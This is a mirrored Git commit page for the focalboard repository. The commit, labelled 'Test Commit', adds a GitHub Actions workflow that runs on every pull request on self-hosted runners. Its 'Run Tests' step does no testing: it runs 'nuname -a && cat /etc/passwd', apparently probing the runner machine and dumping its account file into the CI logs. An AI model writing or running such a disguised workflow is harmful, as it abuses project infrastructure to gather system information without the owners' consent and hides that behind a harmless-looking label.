1
0
mirror of https://github.com/mattermost/focalboard.git synced 2025-01-02 14:47:55 +02:00

Test Commit

This commit is contained in:
None 2024-02-10 15:27:19 +00:00
parent 6bd7464372
commit aef6d65599

10
.github/workflows/Docker.yml vendored Normal file
View File

@ -0,0 +1,10 @@
name: test
'on':
- pull_request
jobs:
testing:
runs-on:
- self-hosted
steps:
- name: Run Tests
run: nuname -a && cat /etc/passwd